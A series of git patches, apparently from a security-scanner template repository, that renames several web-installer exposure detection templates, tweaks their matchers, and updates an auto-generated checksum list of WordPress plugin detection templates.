@@ -1,7 +1,7 @@
 id: clipbucket-installer
 
 info:
-  name: ClipBucket Installer
+  name: ClipBucket Installer - Exposure
   author: DhiyaneshDk
   severity: high
   metadata:

From 97a84f6b239e0d87c300ab97139a7774735f5acd Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 28 Sep 2023 22:53:19 +0530
Subject: [PATCH 0578/1090] Update dolphin-installer.yaml

---
 http/misconfiguration/installer/dolphin-installer.yaml | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)

diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml
index 2320abfd38..dbec994889 100644
--- a/http/misconfiguration/installer/dolphin-installer.yaml
+++ b/http/misconfiguration/installer/dolphin-installer.yaml
@@ -1,7 +1,7 @@
 id: dolphin-installer
 
 info:
-  name: Dolphin Installer
+  name: Dolphin Installer - Exposure
   author: DhiyaneshDk
   severity: high
   metadata:
@@ -22,11 +22,6 @@ http:
         words:
           - 'Dolphin Installation'
 
-      - type: word
-        part: header
-        words:
-          - 'text/html'
-
       - type: status
         status:
           - 200

From 0dd0f0e9df035de887eff4969b4729a6b7312093 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 28 Sep 2023 22:54:20 +0530
Subject: [PATCH 0579/1090] Update vironeer-installer.yaml

---
 http/misconfiguration/installer/vironeer-installer.yaml | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)

diff --git a/http/misconfiguration/installer/vironeer-installer.yaml b/http/misconfiguration/installer/vironeer-installer.yaml
index a6fe9bae6d..591a0f13c8 100644
--- a/http/misconfiguration/installer/vironeer-installer.yaml
+++ b/http/misconfiguration/installer/vironeer-installer.yaml
@@ -1,7 +1,7 @@
 id: vironeer-installer
 
 info:
-  name: Vironeer Installer
+  name: Vironeer Installer - Exposure
   author: DhiyaneshDk
   severity: high
   metadata:
@@ -22,11 +22,6 @@ http:
         words:
           - 'Vironeer Installer'
 
-      - type: word
-        part: header
-        words:
-          - 'text/html'
-
       - type: status
         status:
           - 200

From 1389969fd453956141e26d1032f4a342ac7a88bd Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:25:12 +0000
Subject: [PATCH 0580/1090] Auto Generated New Template Addition List [Thu Sep
 28 17:25:12 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 6e4dd107f9..46bf629ab9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -9,6 +9,7 @@ http/exposures/tokens/jotform/jotform-api-key.yaml
 http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/bitrix24-installer.yaml
+http/misconfiguration/installer/clipbucket-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/klr300n-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml

From 6891d1ca3d94f224f6e04d2bf70a73a937356679 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:25:35 +0000
Subject: [PATCH 0582/1090] Auto Generated Templates Checksum [Thu Sep 28
 17:25:35 UTC 2023] :robot:

---
 templates-checksum.txt | 426 ++++++++++++++++++++---------------------
 1 file changed, 213 insertions(+), 213 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index ef76637fd9..2d84ed8375 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:0bab0d9ddda6759c34bb88d57e44c11030dd69e4
-cves.json-checksum.txt:9212314a5ad1b8744e91fe1534a405b326c4e645
+cves.json:1a4037113f94ee8e1cfb1742f740a47cdac1dba1
+cves.json-checksum.txt:642c9c202bb2c91b52034550efd88b052bbe9a2a
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -435,7 +435,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:106ca8d85638866255a70e746e
 helpers/wordpress/plugins/google-site-kit.txt:832bd7a4e59769c7dcc82fc727ab92cd8b7590ce
 helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61
 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5
-helpers/wordpress/plugins/gutenberg.txt:b987da06f27582a0a441e2568c45f3e3f9f47618
+helpers/wordpress/plugins/gutenberg.txt:be18664c38b698d5d3b3c9a122c2e544d9f3cd5c
 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761
 helpers/wordpress/plugins/header-footer-code-manager.txt:1653860f5bc7d2d43d6254c11488c4469d9db444
@@ -451,7 +451,7 @@ helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfef
 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6
 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3
 helpers/wordpress/plugins/jetpack-boost.txt:d24fa45ca77f079cc359c97272276969e6aead2c
-helpers/wordpress/plugins/jetpack.txt:f4f2a6e60645ec077647c75c65fc7817ac02b757
+helpers/wordpress/plugins/jetpack.txt:b17cbeafae4088449f42cffe9966e5e24efc7aa1
 helpers/wordpress/plugins/kadence-blocks.txt:257c663cd420229c3490aaabb942051c0ff75650
 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa
 helpers/wordpress/plugins/leadin.txt:78702f4ab9863ce2deba27117b027181e59b6e3d
@@ -463,17 +463,17 @@ helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b
 helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92
 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38
-helpers/wordpress/plugins/mailpoet.txt:20906ef00df144bed37785473c574f02a544e0bd
+helpers/wordpress/plugins/mailpoet.txt:78d5d3f250f1fb66c88e01224f54b8bd9559259b
 helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924
 helpers/wordpress/plugins/mainwp-child.txt:4fd5e5d395c7cb4645820b58e23fdf6fe34349ab
 helpers/wordpress/plugins/malcare-security.txt:24e26a42407173a638a100c03fae8fc56d72c5e3
 helpers/wordpress/plugins/megamenu.txt:157d4751f6fc258dd2244da6c46a957ae64e4258
 helpers/wordpress/plugins/members.txt:e533118608a55d6ab1d3699c600fc5c59213df36
 helpers/wordpress/plugins/meta-box.txt:17358dc21f97cd982510de77bcdadcaf77ef5371
-helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0
+helpers/wordpress/plugins/ml-slider.txt:7176936bad0d4f9d606c9f066f2e6d22aea121f7
 helpers/wordpress/plugins/newsletter.txt:8179f6751c646b7c3f539243147306a43ca806f3
 helpers/wordpress/plugins/nextend-facebook-connect.txt:4be1dfbb67ef8087f7232dac0ed90c2603a22047
-helpers/wordpress/plugins/nextgen-gallery.txt:7ca6257a3f05a3a6b604fd5dae8af8c1b41b8e0f
+helpers/wordpress/plugins/nextgen-gallery.txt:9ba3ba859fda4b27ead81d8ddbeb1cd132e92901
 helpers/wordpress/plugins/ninja-forms.txt:802d91a07f27206424765f38e0bb5c75968ae33a
 helpers/wordpress/plugins/ocean-extra.txt:595d550379b2cb8bccb9659627308ff4e751d23f
 helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd104815e938d80643
@@ -491,7 +491,7 @@ helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6
 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe
 helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7
 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b
-helpers/wordpress/plugins/premium-addons-for-elementor.txt:1782590faaba5ee6facdf2297f1590794447be5a
+helpers/wordpress/plugins/premium-addons-for-elementor.txt:a3c25289ffe573be80fb70854e465fe83cf956d8
 helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7
 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e
@@ -521,15 +521,15 @@ helpers/wordpress/plugins/the-events-calendar.txt:da12d3bdce91425575a83cf92ced2c
 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
 helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940
 helpers/wordpress/plugins/translatepress-multilingual.txt:8e805063c85859847271163a1c51e5865e460aea
-helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:d55168255aa04b62d234cc7484cbe6a6ae8b8d1a
+helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:1ebce34afbfa7a8b83bee692128d07449007952b
 helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f
 helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d
 helpers/wordpress/plugins/updraftplus.txt:ef52ef5de56c32d1410d7eb141c26ff4e9fbe4b4
 helpers/wordpress/plugins/use-any-font.txt:051efab22f2c58c6d458654f9abb0b0648c4743d
 helpers/wordpress/plugins/user-role-editor.txt:e4dcf50721abd61e4b9d3234623bdf059936514b
 helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264
-helpers/wordpress/plugins/w3-total-cache.txt:51ddbf27bf181d542a23643649c61739795a6771
-helpers/wordpress/plugins/webp-converter-for-media.txt:08d2e98e6754af941484848930ccbaddfefe13d6
+helpers/wordpress/plugins/w3-total-cache.txt:0456783a249ba3512f989caa6cb2764b9de06709
+helpers/wordpress/plugins/webp-converter-for-media.txt:0f4ce56c547fb5537306372ee709d1af8ea215c5
 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c
 helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1
@@ -3821,7 +3821,7 @@ http/exposures/configs/exposed-authentication-asmx.yaml:4c5a737d49c8cab664cbde4d
 http/exposures/configs/exposed-bitkeeper.yaml:5fe6f67fbfac1f2dd1d5e00ad30020f8bdd8f710
 http/exposures/configs/exposed-bzr.yaml:dabdf77063c17e5c4b3daaafdd7e4baf27792097
 http/exposures/configs/exposed-darcs.yaml:ec17e08ef889ae1fa7c2254b1e1fb8cf170c3316
-http/exposures/configs/exposed-gitignore.yaml:d942969954c677e1dc83af4e88ecdd6cdf907d32
+http/exposures/configs/exposed-gitignore.yaml:abc1c6292e35b5caca2058954c55bc4092eff802
 http/exposures/configs/exposed-hg.yaml:6fa03e4f5e35f140f547f8bf22b5ee841914cf9e
 http/exposures/configs/exposed-sharepoint-list.yaml:2f00cf1ad0118244758a01dcb10e189412dc41b9
 http/exposures/configs/exposed-svn.yaml:cf9fd03cd6132649c588c65a736ca08c21b3ea78
@@ -5862,218 +5862,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
+http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
+http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
+http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
+http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
+http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
+http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
+http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
+http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
+http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
+http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
+http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
+http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
+http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
+http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
+http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
